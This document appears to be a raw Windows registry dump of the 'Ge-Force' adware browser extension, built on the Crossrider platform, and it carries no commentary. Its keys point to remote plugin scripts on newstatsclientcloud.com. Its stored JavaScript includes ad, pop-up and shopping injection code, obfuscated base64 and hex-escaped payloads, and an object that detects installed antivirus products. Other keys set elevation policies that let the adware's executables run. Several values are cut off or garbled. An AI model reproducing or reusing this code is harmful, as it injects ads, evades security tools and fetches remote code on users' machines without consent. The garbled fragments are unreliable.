"BaseClass" = "Drive"

[HKCU\Software\Ge-Force\Plugins\286]
"Version" = "2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"UninstallString" = "%Program Files%\Ge-Force\Uninstall.exe /fcp=1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Ge-Force\Plugins\28]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/28.js"

[HKCU\Software\Ge-Force\Plugins\354]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/354.js"

[HKCU\Software\Ge-Force\Plugins\104]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/104.js"

[HKCU\Software\Ge-Force\Plugins\192]
"Version" = "10"

[HKCU\Software\Ge-Force\Plugins\91]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/91.js"

[HKCU\Software\Ge-Force\Plugins\345]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/345.js"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Ge-Force\Plugins\192]
"Name" = "revizer_ws_dynamic_b2b_m"

[HKCU\Software\Ge-Force\Plugins\94]
"JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.seÃƒâ€°Ã‚Â¾"

[HKCU\Software\Ge-Force\Plugins\93]
"Name" = "superfish_no_coupons_m"

[HKCU\Software\Ge-Force\Plugins\3]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

[HKCU\Software\Ge-Force\Plugins\273]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/273.js"

[HKCU\Software\Ge-Force\Plugins\22]
"Version" = "5"

[HKCU\Software\Ge-Force\Plugins\21]
"JavaScript" = "var CrossriderDebugManager=(function(h){var f={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.debug_app};return h.Class.extend({init:function(){if(appAPI.isMatchPages.apply(this,f.url.debug_page)){h(document).ready(function(){h(body).bindExtensionEvent(debug_request_data,function(j,i){if(i.appId==f.appId){e();}});h(body).bindExtensionEvent(debug_request_reload_background,function(j,i){if(i.appId==f.appId&&appAPI.internal.reloadBackground){appAPI.internal.reloadBackground();}});h(body).bindExtensionEvent(debug_request_reload_plugins,function(j,i){if(i.appId==f.appId){appAPI.resources.requestReload();setTimeout(appAPI.internal.forceUpdate,750);}});h(body).bindExtensionEvent(debug_mode_activate,function(j,i){if(i.appId==f.appId){b(i);}});h(body).bindExtensionEvent(debug_mode_deactivate,function(j,i){if(i.appId==f.appId){d();}});h(body).bindExtensionEvent(debug_request_database,function(j,i){if(i.appId==f.appId){c(i);}});h(body).bindExtensionEvent(debug_request_database_remove,@"

[HKCU\Software\Ge-Force\Plugins\281]
"Version" = "2"

[HKCU\Software\Ge-Force\Plugins\200]
"Name" = "foxydeal_m"

[HKCU\Software\Ge-Force\Plugins\345]
"JavaScript" = "__INFORMATION_MAPPING__={ads:[101,108,116,117,125,126,135,141,158,159,170,171,174,178,180,192,193,206,211,225,230,231,232,233,239,241,261,266,279,284,289,297,300,302,306,309,310,314,333,334,339,340,344],pops:[108,127,155,170,179,190,195,197,208,221,224,265,273,277,278,280,281,292,293,294,296,262,303,324,337,338,341,343,346,347,356,357,358],intext:[103,117,123,142,259,263,342,359,360],shopping:[92,93,102,104,117,124,128,138,184,191,198,199,200,204,213,215,218,223,227,228,234,235,237,242,243,256,260,254,275,282,288,290,295,301,304,307,308,311,317,325,327,328,335,350,351]};"

[HKCU\Software\Ge-Force\Code]
"AppJavaScript" = " /************************************************************************************ This is your Page Code. The appAPI.ready() code block will be executed on every page load. For more information please visit our docs site: http://docs.crossrider.com*************************************************************************************/HOST = http://wt.iwebar.com;TOOLBAR_URL = HOST '/js/toolbar.js';AFFILIATE_ID = 'NONE';appAPI.ready(function($) { /* if (appAPI.db.get('user_id') === null) { if (appAPI.db.get('installation') === null){ appAPI.db.set('installation', new Date().getTime()); return; } else { if ((new Date().getTime() - appAPI.db.get('installation')) Extension [version: appAPI.appInfo.version ] loading...); // Set the affiliate ID //appAPI.db.set('affiliate_id', AFFILIATE_ID); // Include the Base64 library appAPI."

[HKCU\Software\Ge-Force\Manifest]
"RunInFrame" = "false"

[HKCU\Software\Ge-Force\Plugins\221]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(221,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:DOWNLOADS}))();};"

[HKCU\Software\Ge-Force\Plugins\123]
"Version" = "12"

[HKCU\Software\Ge-Force\Plugins\192]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE2NjcxNGMwNTBjMTIxOTJjMWUwNjRlNDI0ZTRmMTAxMjFkMDk1NjQ1NDMxOTFkMWYwZTRiMDg1NzBkMDEwZDE1MGYwNDEwMDI0NzE3MDkxZTQzMGIwYTQyNDk1MTU5NDk0MzViNWM0ODU2NDMxMjE1NGI1NTY2NjM0ZTEwMWExOTA4MTUzYzBiMDA0ODU2NTg0YzA1MGMxMjE5MGE1NjQ1NDMxOTFkMWYwZTRiMDg1NzBkMDEwZDE1MGYwNDEwMDI0NzE3MDkxZTQzMGIwYTQyNDk1MTU5NDk0MzViNWM0ODU2NDMxMjE1NGI1NTY2NjM0ZTA4MDIxODFmMGYwNzMwMDg0ODU2NTg1ZjU0NGE0YTYzNTk0YzRhNGM1YTE4MDgwYTEyMDAxYTBkMDY0ZTQyNGUzNjVhMDcwZDBhNGUzNzQwNzI0ZTRkNTg0NjRiMTAwMjA2MDUxNjBiMjcyYjQ0NTM1OTRlMWQwNTE2MGEwMjBmNDgzNjBiMWExMDVkNGY1ZTVkMDA1NzU5NDk1NDRhNTE1ODE1NGQ1ZjE2MWMxYjAwMDMxZjEwMGIxZjI3MTUxYzFiMDUwZTRiNDI0ZTRhMjczOTJhMmIyMzM5M2YyYTI3MjkzZDM0MzYzYzM0M2UyOTM2MmEyODNjMzkzYTJjMmUzNTI1M2MzMTMyNWY0YTQ5NWUwZDBlMDgxNzAwMDMxOTBiMGM1ZTU2NGE0YjI3MzEyZTJhMjkzYTJhM2UyMzI4M2QzYzMyMzkzNjM5MjYyMjJiMjEzZDMxMzI1ZjFiNTI1YjY2MTc=', 'jlxnmxfiyl'); }"

[HKCU\Software\Ge-Force\Manifest]
"BgVersion" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"CrPublisherId" = "21836"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
"AppName" = "Ge-Force-bg.exe"

[HKCU\Software\Ge-Force\Plugins\46]
"Version" = "5"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
"AppName" = "Ge-Force-codedownloader.exe"

[HKCU\Software\Ge-Force]
"ActiveAppId" = "69129"

[HKCU\Software\Ge-Force\Plugins\183]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/183.js"

[HKCU\Software\Crossrider]
"Verifier" = "7d6635bb3acc762051a59407230a02ec"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
"Policy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"CrAppId" = "69129"
"DisplayVersion" = "1.35.12.18"

[HKCU\Software\Ge-Force\Plugins]
"BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,183,207,47,182,72,345,354,253,93,102,104,123,180,184,192,220,195,200,221,223,242,263,273,281,286,301,91"

[HKCU\Software\Ge-Force\Plugins\72]
"Name" = "appApiValidation"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"DisplayIcon" = "%Program Files%\Ge-Force\utils.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Ge-Force\Plugins\35]
"Name" = "IEAjax"

[HKCU\Software\Ge-Force\Plugins\207]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/207.js"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Ge-Force\Plugins\37]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100),focusTimer:(typeof b.focusTimer===number?b.focusTimer:0),focusDelay:(typeof b.focusDelay===number?b.focusDelay:0)};appAPI.e"

[HKCU\Software\Ge-Force\Plugins\350]
"Name" = "nguava_m"

[HKCU\Software\Ge-Force\Plugins\43]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to pars)"

[HKCU\Software\Ge-Force\Debug]
"IsDebuggingPlugins" = "0"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
"AppPath" = "%Program Files%\Ge-Force"

[HKCU\Software\Ge-Force\Plugins\288]
"Name" = "firstoffer_pricecomp_m"

[HKCU\Software\Ge-Force\Plugins\220]
"JavaScript" = "if(appAPI.isBackground){var ICMBaseManager=function(a){return function(){};};}else{var ICMBaseManager=function(a){var b=(function(f){var i=(function(){var y={\x61\x76\x67\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1,\x61\x76\x61\x73\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2,\x61\x76\x69\x72\x61\x5F\x64\x65\x74\x65\x63\x74\x65\x64:4,\x6D\x73\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:8,\x65\x73\x65\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:16,\x69\x6D\x61\x73\x68\x5F\x64\x65\x74\x65\x63\x74\x65\x64:32,\x76\x69\x70\x65\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:64,\x61\x73\x6B\x74\x6F\x6F\x6C\x62\x61\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:128,\x64\x65\x61\x6C\x70\x6C\x79\x5F\x64\x65\x74\x65\x63\x74\x65\x64:256,\x66\x75\x6E\x6D\x6F\x6F\x64\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:512,\x6D\x63\x61\x66\x65\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1024,\x6D\x61\x6C\x77\x61\x72\x65\x62\x79\x74\x65\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2048,\x62\x61\x69\x64\x75\x61\x76\x5F\x64\x65\x74\x65\x63\x74\x65\x64"

[HKCU\Software\Ge-Force\Plugins]
"NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,72,28"

[HKCU\Software\Ge-Force\Plugins\35]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/35.js"

[HKCU\Software\Ge-Force\Plugins\273]
"Name" = "aedgency_back_button_m"

[HKCU\Software\Ge-Force\Plugins\40]
"Version" = "4"

[HKCU\Software\Ge-Force\Plugins]
"OnRequestPluginList" = "14,42,41,39,38,43,45,64,72"

[HKCU\Software\Ge-Force\Plugins\2]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

[HKCU\Software\Ge-Force\Plugins\21]
"Version" = "5"

[HKLM\SOFTWARE\Ge-Force\Installer]
"BundledIe" = "1"

[HKCU\Software\Ge-Force\Plugins\354]
"Version" = "2"

[HKCU\Software\Ge-Force\Plugins\193]
"URL" = "http://js.newstatsdemosrv.com/plugins/mins/193.js"

[HKCU\Software\Ge-Force\Plugins\42]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/42.js"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Ge-Force\Plugins\47]
"Name" = "resources_background"

[HKCU\Software\Ge-Force\Plugins\39]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g=""%@%ZZCR__AJAXZZ$C@R#"";function e(o,q,l,p){if(typeof(o)!==""string""){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m==""InstallerParams""&&n==""Local""){return appAPI.JSON.parse(appAPI.internal.prefs.getChar(""Params""

[HKCU\Software\Ge-Force\Plugins\193]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ2MjdhNDMwMzBlMTIwMDM4MDIwYTRhNDk0MTQ5MTIxMjA0MWQ0YTQ5NDcxMjEyMTkwYzRiMTE0MzExMGQwOTFlMDAwMjEyMDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1NDUxMDE1NTI0MTdhNmY0YTFiMTUxZjBhMTUyNTFmMWM0NDUyNTM0MzAzMGUxMjAwMWU0YTQ5NDcxMjEyMTkwYzRiMTE0MzExMGQwOTFlMDAwMjEyMDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1NDUxMDE1NTI0MTdhNmY0YTAzMGQxZTFkMGYxZTI0MTQ0NDUyNTM1MDUyNDk0YTdhNGQ1MDQ2NDg1MTE3MGUwODEyMTkwZTExMGE0YTQ5NDEzMDU4MDcxNDFlNTIzYjQ0Nzk0MTRiNWE0NjUyMDQxZTBhMDExZDA0MjEyOTQ0NGE0ZDUyMTEwMTFkMDUwNDBkNDgyZjFmMDYxYzU5NDQ1MTViMDI1NzQwNWY0NDQ2NTU1MzFhNGI1ZDE2MDUwZjFjMGYxYjFiMDQxOTI1MTUwNTBmMTkwMjRmNDk0MTRjMjUzOTMzM2YzZjM1M2IyMTI4MmYzZjM0MmYyODI4MzIyZDNkMjUyZTNlMzkyMzM4MzIzOTIxMzczZTM0NWQ0YTUwNGExMTAyMGMxYzBmMDUxYjBiMTU0YTRhNDY0ZjJjM2UyODI4MjkyMzNlMjIyZjJjMzYzMzM0M2IzNjIwMzIzZTI3MjUzNjNlMzQ1ZDFiNGI0ZjdhMWI=', 'fhsakzfpmp'); }"

[HKCU\Software\Ge-Force\Plugins\1]
"JavaScript" = "var __a0__ = ['\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x39\x75\x36\x61\x32\x70\x36','\x2e\x73\x73\x6c\x2e\x68\x77\x63\x64\x6e\x2e\x6e\x65\x74'].join('')var __a1__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x74\x61\x67\x69\x6e\x67\x2d\x61\x70','\x70\x2e\x63\x72\x6f\x73\x73\x72\x69\x64\x65\x72\x2e\x63\x6f\x6d'].join('')var __a2__ = ['\x68\x74\x74\x70\x73\x3a\x2f\x2f','\x77\x39\x75\x36\x61\x32\x70\x36','\x2e\x73\x73\x6c\x2e\x68\x77\x63','\x64\x6e\x2e\x6e\x65\x74'].join('')var __a3__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x74\x61\x67\x69','\x6e\x67\x2d\x61\x70\x70\x2e\x63\x72\x6f\x73\x73','\x72\x69\x64\x65\x72\x2e\x63\x6f\x6d'].join('')var __a4__ = ['\x68\x74\x74\x70\x3a\x2f','\x2f\x6e\x73\x74\x61\x74','\x73\x2e\x63\x72\x6f\x73','\x73\x72\x69\x64\x65\x72','\x2e\x63\x6f\x6d'].join('')var __a5__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x74','\x61\x67\x69\x6e\x67\x2d\x61\x70\x70','\x2e\x63\x72\x6f\x73\x73\x72\x69\x64','\x65\x72\x2e\x63\x6f\x6d'].join('')var __a6__ = ['\x68\x74\x74\x70\x3a\x2f\x2f\x72\x65\x73\x6f','\x75\x72\"

[HKCU\Software\Ge-Force\Plugins\207]
"Name" = "dbWrapper"

[HKCU\Software\Ge-Force\Plugins\354]
"JavaScript" = "__CTG_MAPPING__={""1"":[""d908e50170d7cb46a92fdbff0d73bb5d""

[HKCU\Software\Ge-Force\Plugins\44]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/44.js"

[HKCU\Software\Ge-Force\Manifest]
"UninstallerOfferAction" = "NA"

[HKCU\Software\Ge-Force\Plugins\182]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var c={DUMMY_PAGE_URL:http://page.our-app.net/blank/resource.html};(function(){if(appAPI&&appAPI.internal&&appAPI.internal.hosts&&typeof appAPI.internal.hosts.dummyPageUrl===string&&appAPI.internal.hosts.dummyPageUrl.length>0){c.DUMMY_PAGE_URL=appAPI.internal.hosts.dummyPageUrl;}}());appAPI.openURL=(function(){var d=appAPI.openURL;var e=function(g){d({url:c.DUMMY_PAGE_URL ?appid= appAPI.appInfo.id &resourcepath= escape(g.resourcePath) &rnd= (new Date()).getTime(),where:g.where,focus:g.focus,focusTimer:g.focusTimer,left:g.left,top:g.top,height:g.height,width:g.width});};var f=function(g){if(!appAPI.utils.isObject(g)){return;}if(!appAPI.utils.isDefined(g.resourcePath)){d(g);return;}e(g);};return function(h,g){var i=h;try{if(appAPI.utils.isString(h)){d(h,g);return;}f(i);}catch(j){}};}());var a=function(){(function(){var f=document.createElement(link);f.type=image/x-icon;f.rel=shortcut icon;f.href=;document.getElementsByTagName(head)[0]"

[HKCU\Software\Ge-Force\Installer]
"zdata" = "0"

[HKCU\Software\Ge-Force\Code]
"NewTabJavaScript" = ""

[HKCU\Software\Ge-Force\Installer]
"Params" = "{ source_id : 001729, sub_id : 0, uzid : 0"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
"Policy" = "3"

[HKCU\Software\Ge-Force\Plugins\184]
"Name" = "noproblemppc_m"

[HKCU\Software\Ge-Force\Manifest]
"Version" = "9"

[HKCU\Software\Ge-Force\Plugins\44]
"Name" = "IEMisc"

[HKCU\Software\Ge-Force\Plugins\286]
"Name" = "sp_j_m"

[HKCU\Software\Ge-Force\Plugins\36]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/36.js"

[HKCU\Software\Ge-Force\Plugins\246]
"Version" = "15"

[HKCU\Software\Ge-Force\Plugins\3]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/3.js"

[HKCU\Software\Ge-Force\Plugins\345]
"Version" = "2"

[HKCU\Software\Ge-Force\Plugins\91]
"Version" = "111"

[HKCU\Software\Ge-Force\Plugins\47]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/47.js"

[HKCU\Software\Ge-Force\Plugins\301]
"Name" = "guava_m"

[HKCU\Software\Ge-Force\Plugins\45]
"Name" = "IEOnRequest"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"Ge-Force-bg.exe" = "8000"

[HKCU\Software\Ge-Force\Plugins\28]
"Version" = "4"

[HKCU\Software\Ge-Force\Plugins\356]
"URL" = "http://js.newstatsdemosrv.com/plugins/mins/356.js"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Ge-Force\Plugins\281]
"Name" = "ibario_tier3_pops_m"

[HKCU\Software\Ge-Force\Plugins]
"BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64,72"

[HKCU\Software\Ge-Force\Plugins\281]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/281.js"

[HKCU\Software\Ge-Force\Plugins\207]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=$jquery_171;function c(f){return true;}function b(g,f){f=appAPI.utils.isFunction(f)?f:c;return d.map(g,function(h){return f(h)?h:null;});}function a(f){f.getList=(function(){var g=f.getList;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.getKeys=(function(){var g=f.getKeys;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.removeAll=(function(){var g=f.removeAll;return function(h){if(!appAPI.utils.isObject(h)){return g.call(f);}d.each(f.getList(h),function(j,k){f.remove(k.key);});};}());}function e(g){g.getList=(function(){var h=g.getList;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callback)){return;}h.call(g,function(j){i.callback(b(j,i.predicate));});};}());g.getKeys=(function(){var h=g.getKeys;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callbac"

[HKCU\Software\Ge-Force\Plugins\193]
"Version" = "9"

[HKCU\Software\Ge-Force\Plugins\195]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/195.js"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
"Policy" = "1"

[HKCU\Software\Ge-Force\Plugins\207]
"Version" = "2"

[HKCU\Software\Ge-Force\Plugins\13]
"Version" = "7"

[HKCU\Software\Ge-Force\Manifest]
"PluginsManifestVersion" = "5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Ge-Force\Plugins\4]
"JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f().appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:) ),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,display),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject(Microsoft.XMLHTTP)}catch(b){}}function ci(){try{return new a.XMLHtt"

[HKCU\Software\Ge-Force\Plugins\41]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/41.js"

[HKCU\Software\Ge-Force\Plugins\337]
"Version" = "1"

[HKCU\Software\Ge-Force\Plugins\78]
"Name" = "CrossriderInfo"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
"AppName" = "Ge-Force-buttonutil.exe"

[HKCU\Software\Ge-Force\Plugins\41]
"Name" = "IEInfo"

[HKCU\Software\Ge-Force\Installer]
"FullVersion" = "1.35.12.18"

[HKCU\Software\Ge-Force\Plugins\93]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/93.js"

[HKCU\Software\Crossrider]
"Bic" = "589912D45CE0412C9CDE01D4C96E2298IE"

[HKCU\Software\Ge-Force\Plugins\220]
"Version" = "38"

[HKCU\Software\Ge-Force\Manifest]
"ChangePrevious" = "false"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
"Policy" = "3"

[HKCU\Software\Ge-Force\Plugins\72]
"JavaScript" = "if(appAPI.__should_activate_validation__===true){(function(){var e={WRONG_STRICT_VALUE:Parameter %PARAM_NAME% value is not supported.,WRONG_TYPE:Parameter %PARAM_NAME% is of wrong type. Valid types: [%VALID_TYPES%].,PARAM_IS_MANDATORY:Parameter %PARAM_NAME% is mandatory.,DB_VAL_TOO_LARGE:appAPI.db storage is limited to 1000 bytes per key. For larger values please use appAPI.db.async};var a=function(m){return m.charAt(0).toUpperCase() m.slice(1);};var h={};var b=appAPI.appInfo.name;var i=function(o,r,q,p){if(typeof p===undefined){p=;}var n=[ new Date().toDateString() new Date().toLocaleTimeString() ] b;var m=;if(typeof console!==undefined){if((q===e.DB_VAL_TOO_LARGE)&&(typeof console.warn===function)){console.warn(n m);}else{if(typeof console.error===function){console.error(n m);}else{if(typeof console.log===function){console.log(n m);}}}}return;};var l=function(p,n,o){var m=p"

[HKCU\Software\Ge-Force\Plugins\3]
"Version" = "2"

[HKCU\Software\Ge-Force\Plugins\35]
"Version" = "4"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
"AppName" = "Ge-Force-buttonutil.exe"

[HKCU\Software\Ge-Force\Plugins\43]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/43.js"

[HKCU\Software\Ge-Force\Plugins\64]
"Version" = "3"

[HKCU\Software\Ge-Force\Plugins\286]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/286.js"

[HKCU\Software\Ge-Force\Plugins\72]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/72.js"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21836]
"69129" = "Ge-Force"

[HKCU\Software\Ge-Force\Plugins\9]
"Version" = "3"

[HKCU\Software\Ge-Force\Plugins\104]
